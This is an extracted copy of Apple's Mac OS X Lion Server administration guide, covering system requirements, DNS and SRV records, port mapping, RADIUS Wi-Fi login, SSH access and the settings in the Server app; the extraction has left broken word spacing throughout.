Lion Server - Advanced Administration

Lion Server: Advanced Administration
Lion serv er fundamentals
Get started
Lion Server requirements

Mac OS X Lion Server has processor, memory, disk, and network requirements. To install Lion Server on a Mac, the Mac must have: A 64-bit Intel proces sor At least 2 gigabytes (GB) of random access memory (RAM) At least 10 gigabytes (GB) of disk space available Your server needs s ignificantly more disk s pacesuch as a high-capacity external hard driveif you want to allow Lion, Snow Leopard, and Leopard us ers to back up their Macs on the server. A s erver needs even more disk space if you want to back up the server using Time Machine. An Internet connection, if youre installing Lion Server from the Mac App Store An Internet connection isnt required after installation. Desktop or s erver hardware is recommended. An active connection to a secure network is recommended for s erver s etup, but is nt required. After setup, your s erver must have a network connection for users to acces s its services. Some podcast encoding operations require a compatible graphics card. Some features have additional system requirements or require additional purchases . For details, s ee the Lion Server website at www.apple.com/macosx/s erver/. A Mac server can be s et up and us ed without a display and can be located where you dont have cons tant phys ical access to it. You can use another Mac to set up and adminis ter a Mac server remotely. For information, see Prepare an adminis trator computer.
Get started
Lion Server tools

You can administer servers in a small to medium organization with the basic tools included in Lion Server. If you need to configure Lion Server in a large organization, or if you have special configuration requirements, you can use advanced administration tools that you may need to install s eparately. You can also use command-line tools to perform s erver administration tasks. Basic tools You can manage us ers and groups, s tart and stop s ervices , change service s ettings, and perform other ess ential s erver administration tas ks us ing the applications and utilities included with Lion Server and des cribed below.
Screen Sharing
Observe and control your server from another computer on the network. You can open Screen Sharing from the T ools menu in the Server app.
Server
Manage users and groups. Monitor server status. Start, stop, and customize services. View and change system, network, and storage settings. Manage an AirPort device.
Server Status widget for Dashboard System Preferences
Monitor server activity from any Mac with Mac OS X Lion. Configure T ime Machine backup of the server. Set up sharing for a directly connected USB or FireWire printer.
For more information about Screen Sharing, Server, and System Preferences, open the application and use the Help menu. For more information about the Server Status widget, s ee Use the Server Status widget. Advanced administration tools
Bes ides the Server app and the other bas ic tools , you can use the applications des cribed below. All except Directory Utility and Xsan Admin are located in the Server folder in Launchpad. If your server doesnt have that folder with the advanced tools in it, you can ins tall them as des cribed in Use advanced tools for more services.
Directory Utility
Configure advanced connections to directory servers. You can open Directory Utility from the Tools menu in the Server app.
Podcast Composer
Follow a structured, graphical process to create workflows that control how Podcast Producer generates and distributes podcasts.
Server Admin Server Monitor System Image Utility Workgroup Manager
Change advanced service settings and configure advanced services. Remotely monitor and manage one or more Xserve systems. Create NetBoot, NetInstall, and NetRestore images for Mac computers. Manage users, groups, computers, and computer groups in advanced server deployments. Manage preferences for Mac OS X Lion users.
Xgrid Admin
Remotely manage clusters, monitor controller and agent activity, and check job status on the grid.
Xsan Admin
Set up and manage a storage area network (SAN) to provide fast, shared storage among Macs connected to a Fibre Channel network. Located in the Utilities folder in Launchpad.
For more information about an advanced application, open it and use the Help menu. Command-line tools You can also use UNIX tools in the Terminal app to administer services, manage users, and perform most other server administration tas ks. For more information, s ee About the command-line environment of Lion Server.
RELATED TOPICS
Command line tools us ed in Lion Server administration
Get started
Services
Lion Server can provide s ervices to Macintosh, Windows , and UNIX computers, and to iOS devices such as iPhone, iPod touch, and iPad. You use the Server app to turn on the s ervice you want to provide, cus tomize service s ettings, and turn off services you dont need. Services include:
Address Book service provides centralized contact information .
File sharing lets users store and share folders and files on the server.
iCal service provides shared calendars, so users can check each others availability, book conference rooms, and schedule meetings and events.
iChat Instant messaging service lets users collaborate by chatting and sharing information.
Mail service lets users send and receive email on your local network and the Internet using any email application or, optionally, a web browser.
Podcast service lets users publish audio and video podcasts they record and edit using the Podcast Publisher app on their Macs with Mac OS X Lion.
Profile Manager service lets you manage mobile devices and distribute configuration profiles that set up users' Macs and iOS devices to use your server.
A T ime Machine destination lets users back up their Macs on your servers disk. VPN service gives users secure remote access to your server and network via the Internet.
Web service lets you publish custom websites.
Wiki service lets users share information using wikis, blogs, and web calendars.
Get started
Server information
While Lion Server is providing accounts and services to users, you can check server system information and change server system s ettings. Track s erver alerts Monitor s erver stats View server information Allow remote login to your server via SSH Allow s creen s haring and remote management Allow remote adminis tration Improve performance as a dedicated server Use push notification Manage the servers SSL identity certificates Find the servers network address and host name Manage server storage
Get started
Disk preparation
If youre going to ins tall Lion Server on an existing computer and want a clean installation rather than an upgrade, use the Disk Utility app to erase the disk youll ins tall on. With Disk Utility, you can also partition the servers dis k into multiple volumes or set up a RAID set. You can us e Dis k Utility when you begin ins talling Lion Server. For instructions, search Mac Help for Erase and reinstall Mac OS X. You can also use Disk Utility after installing Lion Server. Dis k Utility is in the Utilities folder of Launchpad. Formats for server disks When you erase a dis k before installing Lion Server on it, select one of these formats : Mac OS Extended (Journaled): This format is recommended, and is the most common format for Mac and Mac server s tartup disks . Mac OS Extended (Case-sensitive, Journaled): This format is worth considering if youre planning to have your server hos t a cus tom website with static web content instead of or in addition to wikis. A case-s ensitive disk can host s tatic web content with a more direct mapping between files and URLs. You can erase other dis ks using one of the formats above, or a non-journaled variant: Mac OS Extended or Mac OS Extended (Case-sensitive). If the server has a disk formatted using the UNIX File System (UFS) format by an earlier version of Mac OS X or Mac OS X Server, do not use the UFS dis k for a Lion Server s tartup dis k. Volumes on a partitioned disk
Partitioning a hard dis k creates a volume for Lion Server and one or more volumes for service data and other software. The volume you install Lion Server on s hould be at leas t 10 GB. This volume should be larger if you plan to store shared folders, wikis, and other service data on it. The volumes on a partitioned disk are often s imply called disks . Each volume appears as a disk in the Finder, and you use each volume as if it were a separate dis k. RAID sets If youre installing Lion Server on a computer with multiple internal hard disk drives, you can create a RAID (Redundant Array of Independent Disks) s et to optimize storage capacity, improve performance, and increase reliability in cas e of a disk failure. For example, a mirrored RAID set increases reliability by writing your data to two or more disks at once. If one dis k fails, your server automatically continues using other disks in the RAID set. You can set up RAID mirroring or another type of RAID set when you begin ins talling Lion Server. After ins talling, you can set up RAID mirroring on a dis k that isnt partitioned. To prevent data los s, you should set up RAID mirroring as early as possible. For information about setting up a RAID set, s earch Disk Utility Help for Using RAID sets . If you choose a RAID set, you won't get a recovery partition or FileVault full disk encryption. A recovery partition allows you to reinstall Mac OS X or recover your entire system from a Time Machine backup. Full disk encryption isnt recommended for a Lion Server startup disk or any dis k that s tores s ervice data. If thes e disks are encrypted, the server cant restart until you go to the s erver and enter the pass word at the s ervers keyboard. If you use Lion Server to share an encrypted disk, the disk isnt available to users until you enter the password at the servers keyboard.
Get started
Netw ork preparation
Register the servers Internet host name

To allow users to acces s the s erver by us ing its host name on the Internet, you must register the servers host name.
1. Obtain an Internet domain name like example.com. You can purchas e one from a public domain name regis trar. For information about domain name regis trars, search the web. 2. Regis ter a unique hos t name for this s erver, such as s erver.example.com, with your domain name registrar. 3. Have a DNS hos ting s ervice add records for this server to its DNS s ervers. Your DNS registrar might provide DNS hosting service, or you can s earch the web for a provider.
RELATED TOPIC
DNS records for your server
Get started
DHCP server configuration for your server

Before you set up your Mac server, configure your DHCP s erver to s upply important network addresses to computers on your intranet. The DHCP s erver can provide each computer with its own IP address, the IP address of your network router, and the IP addresses of DNS s ervers for your network. When configuring your DHCP server, be s ure to do the following: Configure your networks DHCP server to assign a fixed (static) IP address to your server. This feature is called static mapping or DHCP reservations. With a fixed IP address, your server always has the s ame IP address , so other computer users can connect to it reliably. Configure your DHCP s erver to provide your servers IP address as the DNS s erver address , unless your intranet has a DNS server. If your intranet does nt have a DNS server, your s erver is configured as a DNS s erver during initial s erver setup. If your intranet connects to the Internet through a router s upplied by your Internet s ervice provider or purchased from a computer retailer, the router is usually your DHCP server. For information about configuring your router, see its documentation. If your intranet and Internet connection are managed by your organization, ask the DHCP administrator to configure the DHCP
servers for your Mac s erver. If you don't have a DHCP server, you can set up Lion Servers DHCP service. For information, see DHCP setup overview.
Get started
DNS records for your server

Before you set up your server, have your DNS s erver administrator add records for your s erver. After these records are added to a DNS server, users can access your server by using its host name, such as server.mycompany.com. Users can use your servers hos t name on your intranet if the DNS server administrator for your intranet adds DNS records for your server. If your intranet does nt have a DNS server, us ers can acces s your server by using its local hos tname, s uch as server.local. Users can use your servers hos t name on the Internet, if a DNS hos ting s ervice adds the records described below to its DNS servers . These records must point your servers hos t name to the public IP address of your Internet router, if you have one. The DNS registrar you obtained a domain name from might provide DNS hosting service, or you can s earch the web for a provider. A (address) An A record is required. It maps your s ervers host name to its IP address. If you have an Internet router, your server has a unique, private IP address on your intranet, but on the Internet it us es the routers public IP address. PTR (pointer) A PTR record is required. It provides a reverse lookup by mapping the servers IP addres s to its hos t name. If you have an Internet router, your s erver has a unique private IP address on your intranet, but on the Internet it us es the routers public IP address. MX (mail exchange) If your server provides mail service, the optional MX record s pecifies that your server is a mail server for your domain. An MX record lets users have an email addres s like mchen@example.com. Without an MX record, email address es must include your servers full hos t name (for example, mchen@server.example.com). CNAME (alias) One or more optional CNAME records provide convenient access to services your s erver provides , such as mail.example.com and www.example.com. SRV for Address Book service If your server provides Address Book service, you can add an optional SRV record for Addres s Book Servers CardDAV protocol. If you have an SSL certificate for Address Book service, add a record that maps _carddavs._tcp for port 8443 to your servers hos t name. For example: _carddavs._tcp 86400 IN SRV 0 1 8443 server.example.com If you dont have an SSL certificate for Address Book service, add a record that maps _carddav._tcp for port 8008 to your servers hos t name. For example: _carddav._tcp 86400 IN SRV 0 1 8008 server.example.com SRV for iCal service If your server provides iCal calendar service, you can add an optional SRV record for iCal Servers CalDAV protocol. If you have an SSL certificate for iCal s ervice, you can add an optional record that maps _carddavs._tcp for port 8443 to your servers hos t name. For example: _caldavs._tcp 86400 IN SRV 0 1 8443 server.example.com If you dont have an SSL certificate for iCal s ervice. add a record that maps _caldav._tcp for port 80008 to your servers host name. For example: _caldav._tcp 86400 IN SRV 0 1 80008 server.example.com SRV (service locator) for iChat service If your server provides iChat instant mess aging s ervice, you can add two optional SRV (s ervice locator) records for iChat Servers XMPP (Jabber) protocol. One record controls connections between your s erver and other XMPP s ervers. It maps _xmpp-server._tcp for port 5269 to your servers hos t name. For example:
_xmpp-server._tcp 86400 IN SRV 0 1 5269 server.example.com Another record controls iChat and other XMPP client connections to your server. It maps _xmpp-client._tcp for port 5222 to your servers hos t name. For example: _xmpp-client._tcp 86400 IN SRV 0 1 5222 server.example.com These SRV records let users have an iChat address like mchen@example.com. Without these SRV records, iChat addresses must include your servers full hos t name (for example, mchen@server.example.com).
Get started
Port mapping for network and server protection

If you have a network router that shares its Internet connection with computers on your intranet, such as an AirPort Extreme Base Station (802.11n) or a Time Capsule, the router isolates your intranet from the Internet. Thes e Internet-sharing routers protect your intranet against malicious attacks from the Internet by blocking communications that originate outside the intranet. Computers on the Internet cant acces s your server unless you configure your router to expose specific services on the Internet. For example, you might expose your wiki and web services on the Internet, but not file s haring. You can still control access to wikis by requiring users to log in to view them. The process of expos ing individual services to the Internet is called port mapping or port forwarding. Internet users can access your exposed services by using an Internet host name, s uch as server.mycompany.com, that you register with a public DNS registrar or a DNS hosting service. Your regis tered host name points to the public IP address you got from your Internet service provider and configured your router to use. Internet us ers can also access your exposed s ervices by using your public IP addres s directly ins tead of by us ing an Internet host name. When us ing your Internet host name or public IP addres s to access a specific s ervice, such as your wiki service, users actually reach your router. If you exposed the s ervice, your router forwards the request to your server. If you didnt expose the service, the router doesnt forward the request, and the user cant get that service from your server. If you want to let Internet us ers with accounts on your s erver access services that arent exposed to the Internet, you can turn on VPN service. It provides a s ecure remote connection to all services on your intranet.
RELATED TOPICS
Router port mapping Manage AirPort port mapping and Wi-Fi login Register the servers Internet host name About VPN
Get started
Router port mapping

If you have a cable router, DSL router, or other network router that shares its Internet connection with computers on your intranet, you can manually configure the router to protect your intranet while allowing access to selected services from the Internet. You configure your router to forward requests for individual services to your server. This process is called port mapping or port forwarding, because each service communicates through an abs tract, numbered communication port. Unlike the Ethernet port on your computer, thes e ports arent physical. You can configure port mapping on an AirPort device by using the Server app. For information, see Manage AirPort port mapping and Wi-Fi login. You can manually configure port mapping on most Internet routers by us ing their configuration s oftware. Usually, the configuration software consists of s everal webpages. Us ing a web browser on any computer connected to your intranet, you go to the webpage with s ettings for port mapping or port forwarding. In some cas es, you can select s tandard services such as web or VPN and specify that each be mapped to your s ervers IP address . In other cases, you mus t enter port numbers for services and enter your servers IP addres s for each one. For a list of s ervices and the corresponding ports for which you might want to set up port mapping or forwarding, s ee Services and ports.
Get started
AirPort port mapping

If you have an AirPort Extreme Bas e Station (802.11n) or a Time Capsule, Lion Server can automatically manage it to protect your intranet, while allowing access to selected services from the Internet. You can us e the Server app to des ignate public s ervices that can be access ed by computers on the Internet. Lion Server configures your AirPort device to expose those public services on the Internet. The process of expos ing individual services to the Internet is called port mapping or port forwarding. For more information, see Port mapping for network and server protection. You can also let users log in to your wireles s network with their user name and pas sword instead of the Wi-Fi network password. In this case, your server provides Remote Authentication Dial In Us er Service (RADIUS) for your AirPort device and authorizes all user accounts on the server to access your wireless network. For more information, see About RADIUS for AirPort. Your AirPort device mus t have its Connection Sharing option set to Share a public IP address (that is, an Internet connection) in order for Lion Server to manage it. The advanced option IPv6 Mode must be set to Tunnel. The default hos t option should also be turned off, which is the default setting. You s hould make sure the AirPort device has a s ecure password ins tead of the default password, which is pub lic. You need to know the AirPort device pass wordnot the Wi-Fi network pas swordto turn on AirPort management.
RELATED TOPIC
Manage AirPort port mapping and Wi-Fi login
Get started
Manage AirPort port mapping and Wi-Fi login

The Server app can manage an AirPort device to give Internet computers access to selected s ervices, and to let users log in to your wireles s network with their name and pass word. The Server app can manage an AirPort Extreme Base Station (802.11n) or a Time Caps ule. To be managed, your AirPort device must have its Connection Sharing option set to Share a public IP address (that is, an Internet connection). The advanced option IPv6 Mode must be set to Tunnel. The default hos t option should also be turned off, which is the default setting. If dont use the Server app to manage your router, you can use the routers configuration software to protect your server and your intranet. For information, see Router port mapping. Add or remove public services You can us e the Server app to des ignate public s ervices that can be access ed by computers on the Internet. Lion Server configures your AirPort device to expose those public services on the Internet. The process of exposing individual services to the Internet is called port mapping or port forwarding . For more information, see Port mapping for network and server protection. 1. In the Server app s idebar, s elect your AirPort device. The AirPort device is listed in the Hardware section of the sidebar. 2. To expose a service to computers on the Internet, click the Add button (+) and choos e the s ervice from the pop-up menu. If the service you want to add is nt listed in the pop-up menu, choos e Other, and then enter the service name and port. For a lis t of services, s ee Services and ports . Note: Exposing web service als o exposes wiki, web calendar, webmail, and Profile Manager services. 3. To s top a listed service from accepting connections initiated by computers on the Internet, select the s ervice and click the Delete button (). 4. To apply your changes, click Res tart AirPort. If asked, enter the password for your AirPort device. Important: Restarting your AirPort device interrupts its services for all computers on your intranet for up to a minute. AirPort device services may include Internet access , DHCP service, and a shared disk for Time Machine backup or other us es. When entering the pass word to authorize restarting the wireless device, use the password for your AirPort device, not the password for your Wi-Fi network. Lion Server remembers this pass word, s o you dont have to enter it again unless your
change it on your AirPort device. Services that arent in the Public Services list can get incoming connections only from the servers intranet. Allow user name and password login over Wi-Fi You can let users log in to your wireless network with their user name and pass word ins tead of the Wi-Fi network pas sword. In this cas e, your server provides Remote Authentication Dial In User Service (RADIUS) for your AirPort device and authorizes all user accounts on the server to access your wireless network. For more information, see About RADIUS for AirPort. 1. In the Server app s idebar, s elect your AirPort device. The AirPort device is listed in the Hardware section of the sidebar. 2. If you want users to log in to your wireles s network with their user account credentials , select Allow user name and password login over Wi-Fi. Important: Your server will lose its connection to the AirPort device, unless the two are connected via a wired Ethernet network. Dont select this option if you want to let users log in to your wireless network with the Wi-Fi network pass word. You can turn off RADIUS using the AirPort Utility app (in the Utilities folder in Launchpad). 3. To apply your changes, restart your AirPort device by entering its pass word and clicking Set. Important: Restarting your AirPort device interrupts its services for all computers on your intranet for up to a minute. AirPort device services may include Internet access , DHCP service, and a shared disk for Time Machine backup or other us es. When entering the pass word to authorize restarting the AirPort device, us e the pass word for the device, not the pass word for your Wi-Fi network. Lion Server remembers this password, so you dont have to enter it again unless your change it on your AirPort device. Selecting this option starts RADIUS on your s erver, registers the selected AirPort device with RADIUS, and authorizes all user accounts on the server to access your wireless network.
Get started
About RADIUS for AirPort

Lion Server can provide Remote Authentication Dial In User Service (RADIUS) for your AirPort Extreme Base Station (802.11n) or Time Caps ule. RADIUS keeps your wireles s network secure by making sure its us ed only by authorized users. With RADIUS, users log in to your wireless network by entering the name and pass word of a user account on your s erver. They cant log in to your wireless network with the Wi-Fi network password, which is configured on the AirPort Extreme Base Station or Time Caps ule. Without RADIUS, anonymous users who learn your Wi-Fi network pass word can log in to your wireless network. When a us er tries to access the wireles s network of an AirPort Extreme Base Station or a Time Capsule, the device communicates with RADIUS on your server us ing Extensible Authentication Protocol (EAP) to authenticate and authorize the user. Users are given access to the network if their user credentials are valid and they are authorized to use the AirPort Extreme Base Station or Time Caps ule. A user who isnt authorized cant acces s the network through the AirPort Extreme Base Station or Time Capsule. You turn on RADIUS for Lion Server by s electing your Apple wireles s device in the Server app sidebar and selecting Allow users name and pas sword login over Wi-Fi. The Server application s tarts RADIUS on your server, regis ters the s elected Apple wireless device with RADIUS, and authorizes all user accounts on the server to access your wireles s network.
Get started
Services and ports

If your server connects to the Internet through a cable router, DSL router, or other network router, you can configure port forwarding (or port mapping) to allow access to s ome services from the Internet while protecting other services and other computers on your network. Use the following table to determine the port numbers for the services you want to expos e on the Internet. Configure your router to
forward only those ports to your servers IP address. Some Internet routers may you to specify TCP or UDP for each port, while other routers dont. For specific information about how to configure port forwarding on your router, s ee its documentation. If your router is an AirPort Extreme Base Station (802.11n) or a Time Caps ule, you can use the Server app to configure port forwarding. For information, see Manage AirPort port mapping and WiFi login. If your intranet has a s eparate firewall device, and you want to allow access to s ome services outside your intranet, as k the firewall administrator to open the firewall for the communications ports and protocols that your services use. Use the following table to determine the port numbers you need to have open on the firewall.
Serv ice Address Book Server Address Book Server SSL iCal Server iCal Server SSL iChat Server iChat Server SSL iChat server-to-server iChat Server file transfer iChat local iChat audio/video RTP and RTCP File sharing SMB File sharing AFP Mail service SMTP standard Mail service POP3 Mail service IMAP Mail service SMTP submission Mail clients IMAP SSL Mail clients POP3 SSL Remote login SSH (Secure Shell) Screen sharing VNC Web service HTT P Web service HTT PS Web service custom website Note: Exposing web service also exposes wiki, web calendar, webmail, and Profile Manager services. Port 8008 8443 8008 8443 5222 5223 5269 7777 5678 1638416403 139 548 25 110 143 587 993 995 22 5900 80 443 YourPortNumber TCP or UDP T CP T CP T CP T CP T CP T CP T CP T CP UDP UDP T CP T CP T CP T CP T CP T CP T CP T CP T CP T CP T CP T CP T CP
VPN L2TP ISAKMP/IKE VPN L2TP VPN L2TP IKE NAT Traversal VPN L2TP ESP (firewall only) VPN PPTP
500 1701 4500 IP protocol 50 1723
UDP UDP UDP n/a T CP
Get started
Prepare an administrator computer

You can us e the Server app on an administrator computer to set up and manage your server over the network. You can install the
Server app on a Mac that is nt a server, making it an administrator computer. If you have more than one server, they already have the Server app ins talled, and you can us e them as administrator computers. As illus trated below, you us e the Server app on the administrator computer to check server s tatus, manage accounts and services, and view or change server system s ettings. The remote server doesnt need a display.
1. Install the Server app on a Mac you want to be an administrator computer by doing either of the following: Copy from your s erver. You can copy the Server app from your s erver to a Mac that you want to be an adminis trator computer. Install from the Mac App Store. After purchas ing Lion Server from the App Store on your server, you can install it free of charge on a Mac you want to be an administrator computer. You open the App Store on the pros pective adminis trator computer, find Lion Server in the App Store, click Buy, and provide the Apple ID you used to purchas e Lion Server. The Server app is downloaded to the administrator computer. 2. Open the Server app you installed in step 1, and then choose Manage > Connect to Server. The Choose a Mac dialog appears. If the Welcome to Server dialog appears instead, choos e Manage > Connect to Server again. 3. You can now select another Mac to manage, or select a Mac that's ready for server s etup, and then click Continue. For additional instructions , see Manage Lion Server remotely or Set up a server remotely. Note: If you select This Mac (that is, the Mac youre working on) and click Continue, the Server app makes the Mac a server.
Get started
Use advanced tools for more services

Managing us ers , groups, and services is eas y with the Server app. You can change advanced s ettings and configure advanced accounts and services not available in the Server app by using advanced adminis tration tools. If your server doesnt have the advanced tools (in the Server folder in Launchpad), you can install them. For information about advanced tools, accounts, services, and settings, see Lion Server tools.
To add the adminis tration tools to your server, download the Server Admin Tools for Mac OS X Lion Server from the AppleCare Support Downloads website at www.apple.com/support/downloads /, and then install the downloaded software.
Get started
More information
For more information, s ee thes e res ources .
Lion Server website (www.apple.com/macosx/server/) Enter the gateway to extensive product and technology information.
Lion Server Support website (www.apple.com/support/lionserver/) Access hundreds of articles from Apples support organization. Apple Training and Certification website (www.apple.com/training/) Hone your server administration skills with instructor-led or self-paced training, and differentiate yourself with certification. Apple Discussions website (discussions.apple.com) Share questions, knowledge, and advice with other administrators. Apple Mailing Lists website (www.lists.apple.com) Subscribe to mailing lists so you can communicate with other administrators using email.
The Serv er app
Start or stop a service

Starting a service makes it available to us ers on your network, and stopping a s ervice makes it unavailable. Start a service Starting a service makes it available for users on your network. 1. In the Server app s idebar, s elect the service you want to start. 2. Click the On/Off switch to turn on the service. 3. If a dialog asks whether you want to allow Internet acces s to the s ervice you turned on, click Allow to configure your AirPort device and make the service acces sible to Internet users. Click Dont Allow if you dont want the service to be access ible to computers on the Internet, or if youre not sure. You can change Internet acces s to s ervices later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login. The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device.Thes e services include Address Book, iCal, iChat, Mail, and Web. If you have an Internet router that is nt lis ted in the Server s idebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For Information, see Router port mapping. Stop a service Stopping a s ervice makes it unavailable to us ers on your network. 1. In the Server app s idebar, s elect the service you want to stop. 2. Click the On/Off switch to turn off the service.
The Serv er app
Manage Lion Server remotely

You can connect the Server app to a Mac server over the network and manage users, groups, services, and system information on the remote s erver. The remote server must have Mac OS X Lion Server.
1. If neces sary, install the Server app on the Mac you want to use for administering your server. For instructions, see Prepare an administrator computer. 2. In the Server app, choos e Manage > Connect to Server. 3. Select the server you want to manage, and then click Continue.
If you want to manage a server that isnt listed, such as a s erver outside your intranet, select Other Mac, click Continue, and then enter its host name or IP address . 4. Enter an administrator name and password for the server you selected, and then click Connect.
The Serv er app
Manage general settings
Allow remote login to your server

If you use the Server app to allow remote login, you can us e SSH (Secure Shell) to log in to your server from another computer. Allow remote login using SSH 1. Select the server in the Server app sidebar, and click Settings. 2. Select Allow remote login using SSH. Selecting this option als o enables the secure FTP (sftp) service. Allowing remote login to your s erver can make your server les s secure. For information about keeping your s erver secure, search Mac Help for Protect the information on your Mac. Log in from another computer You can log in to your server by using the ssh command-line tool on another computer. You cant use Telnet to log in to your server. Open the Terminal app or another SSH client app and enter an ssh command as follows: ssh -l username [IP address] For example, if your us er name is ravi and your computers IP address is 192.168.1.100, enter: ssh -l ravi 192.168.1.100 For more information, see the man page for ssh.
The Serv er app
Allow screen sharing and remote management

You can us e the Server app to let other computers view your s creen and control your server. The other computers user sees whats on your s creen and can open, move, and close files and windows, open apps , and even restart the server. If you allow s creen sharing and remote management, your server can be observed and controlled by screen sharing software using the VNC protocol on another computer or Apple Remote Des ktop on another Mac. VNC screen sharing is included with Mac OS X Lion and Mac OS X Snow Leopard. Its also available for Windows computers and for iPhone, iPad, and iPod touch. Apple Remote Desktop is available from the Mac App Store.
1. Select the server in the Server app sidebar, and click Settings. 2. Select Enable screen s haring and remote management. Selecting this option in the Server app only allows screen sharing and Apple Remote Desktop access by the administrator account created when the s erver was initially set up. If you want to s pecify who can share your screen and what capabilities Apple Remote Desktop users have, use the Sharing pane of System Preferences.
The Serv er app
Allow remote administration
If you use the Server app to allow remote administration, your server can be administered by the Server app on another Mac.
1. Select the server in the Server app sidebar and click Settings. 2. Select Allow remote adminis tration using Server.
RELATED TOPICS
Manage Lion Server remotely Prepare an adminis trator computer
The Serv er app
Improve performance as a dedicated server

You can regulate system resources for better performance as a dedicated s erver. The server can be more responsive to users whos e computers and mobile devices get services from it, while being less res pons ive when you use apps on it.
1. Select the server in the Server app sidebar, and click Settings. 2. Select Dedicate sys tem resources to server services. This change takes effect when the server restarts.
The Serv er app
Manage netw ork settings
Find or change your servers name

You can see and change your servers computer name and local hostname by us ing the Server app. The computer name, which you can change, identifies the s erver to users who are browsing for shared computers in the Finder. The local hostname, also known as the local network name, is a name us ers can us e to get all services from your server on your intranet. By default, the local hostname is the computer name followed by .local. You can change the first part of the local hos tname, but it always ends with .local. The local hostname cant include spaces; theyre replaced with hyphens (-). Capitalization doesnt matter in a local hostname. For example, if the computer name is Server, the local hostname is initially Server.local or server.local. If the computer name is Design Team Server, the default local hostname is Design-Team-Server.local or designteam-server.local. Bonjour is an Apple networking technology that makes it easy to set up and use devices and s ervices on a network. Because Bonjour-compatible devices and s ervices advertise their availability, its eas y for us ers (or an application or service) to find devices and s ervices that they want to us e. For example, if you turn on file s haring service, Mac OS X Lion users on your intranet s ee your server in the Shared s ection of the Finder sidebar.
1. To find your s ervers computer name, select the server in the Server app sidebar and click Network. 2. To find the local hostname and optionally change the computer name or the local hos tname, click Edit next to the computer name. You can s ee and change the computer name and the local hostname in the dialog that appears. The computer name can be 63 Roman characters or fewer. It can include spaces, but avoid using =, :, or @.
RELATED TOPIC
Find or change your s ervers host name
The Serv er app
Find or change your servers host name

You can see and change your servers host name by using the Server app. If you change the host name, you may also need to update the DNS server for your network, and us ers computers may need to be reconfigured.
The host name is the full, unique name that identifies the server on your intranet and (optionally) on the Internetfor example, server.mycompany.com or server.mycompany.private. The DNS s erver for your intranet must be configured to map the host name to the servers intranet IP address. If another server on your intranet provides DNS service, as k the DNS server administrator for help. If you want Internet us ers to access your server by using its hos t name, an Internet DNS hos ting s ervice mus t configure its DNS servers to map the host name to your servers Internet IP address.
1. To find your s ervers host name, select the server in the Server app sidebar and click Network. 2. To change the hos t name, click Edit next to the host name, and proceed through the Change Host Name ass is tant. For information about settings in a Change Host Name as sistant pane, click the Help button in the pane. After changing your servers host name, the DNS s erver for your network must be updated so that the new hos t name points to your servers IP addres s. Als o, a revers e lookup of the IP addres s must point to the new host name. If your DNS s ervice is provided by a DNS hosting service, your ISP, or another server on your network, ask the provider to update your servers DNS records. If your server provides its own DNS service, you can use Server Admin to update it. For information about Server Admin, s ee Lion Server tools. Users who have ins talled profiles from your s erver can update their Macs to use the servers new host name by getting new profiles and installing them. Lion Server automatically creates a new profile each time a user downloads one, and uses the servers current hos t name in the new profiles. Changing your s ervers host name may dis rupt the connections of users computers that have Mac OS X Lion. If this happens, users need to remove your server from their list of network account s ervers and then add it again. For information, search Mac Help for Join your Mac to a network account server.
RELATED TOPIC
Find or change your s ervers name
The Serv er app
Find or change your servers IP address

The Server app displays your s ervers IP address, and you can change it in the Network pane of System Preferences. If you change the IP address , you may also need to update the DNS server for your network, and us ers computers may need to be reconfigured. If your server has multiple network interfaces, you can find and change each ones IP address .
To find your s ervers IP address, select the server in the Server app sidebar and click Network. The numeric IP address appears below the Interfaces heading, to the right of network interface name. If your server has multiple interfaces , each is listed. To change the IP address , open System Preferences , click Network, select the network s ervice listed on the left, and enter an IP addres s on the right. You cant change the IP addres s if the Configure IPv4 setting is Using DHCP. In this case, the DHCP server for your network as signs an IP address to your server. The DHCP server should be configured to assign your s erver the same IP address all the time. This feature is called static mapping or DHCP reservations. If you have an Internet router, its probably your DHCP server, and you s hould see its documentation for instructions. If the IP addres s cant be edited, you can enable editing by changing the Configure IPv4 s etting to Manually or Using DHCP with manual address. After changing your servers IP addres s, the DNS s erver for your network must be updated so that your servers host name points to the new IP address . Also, a reverse lookup of the new IP address must point to your servers hos t name. If your DNS s ervice is provided by your ISP or another server on your network, ask your ISP or the DNS server administrator to update your servers DNS records. If your server provides its own DNS service, you can use Server Admin to update it. For information about Server Admin, see Lion Server tools . Changing your s ervers IP address may dis rupt the connections of users computers that have Mac OS X Lion. If this happens, users need to remove your server from their list of network account s ervers and then add it back. For more information, search Mac
Help for Join your Mac to a network account server.
The Serv er app
Manage server storage

You can see information about your servers disks and their contents by using the Server app. The Storage pane dis plays a list of available dis ks and the amount of space available on each disk. You can brows e the folders and files on a dis k, create new folders, and change access permissions.
1. In the Server app s idebar, s elect the server, and then click Storage. 2. Choose how you want to brows e disk contents by clicking a View button in the lower left corner of the Storage pane. To view dis ks, folders, and files in a lis t, click the List View button. Lis t view s hows the amount of available space as a number and a graph. You can show or hide disk and folder contents by clicking disclos ure triangles in lis t view. To view dis ks, folders, and files in columns, click the Column View button. You can resize or expand columns as follows: To resize columns , drag the bottom of a column divider (where two vertical lines appear) To resize all columns at once, hold down the Option key as you drag To expand a column to reveal its longes t item, double-click the column divider To expand all columns to reveal their longest items , Option-double-click any column divider To expand all columns equally to reveal the longes t item, hold down Shift-Option while double-clicking any column divider To resize columns , Control-click a column divider and choose from the s hortcut menu 3. To create a new folder, select the dis k or folder you want to contain it, and then choose New Folder from the Action pop-up menu. 4. To change an items access permissions , select the item and choos e Edit Permissions from the Action pop-up menu. For detailed instructions , see Set folder access permiss ions. 5. To propagate a folders access permiss ion to the items it contains, s elect the folder and choose Propagate Permissions from the Action pop-up menu. Important: Propagation begins as soon as you click OK, and you cant undo propagation. Before clicking OK, make sure you select the folder and permiss ion settings you intend.
The Serv er app
Monitor serv ers
Check server status

The Server app shows the overall status of each service.
In the Server s idebar, look for a green s tatus indicator next to each service icon. A service with a status indicator is turned on and operating normally. A s ervice without an indicator is turned off.
RELATED TOPIC
Start or s top a service
The Serv er app
Monitor serv ers
View server information

You can see general information about your server by using the Server app. The servers Overview pane displays the Mac model name, processor, serial number, storage capacity, memory s ize, startup dis k, s ys tem vers ion, and amount of time s ince the last system res tart.
1. In the Server app s idebar, s elect the server by name, and then click Overview. 2. To s ee more information about the s tartup disk and any other disks connected to the server, click the arrow next to the startup disk name. Youll see the Storage pane, which highlights the startup dis k in the list of available disks .
RELATED TOPIC
The Serv er app
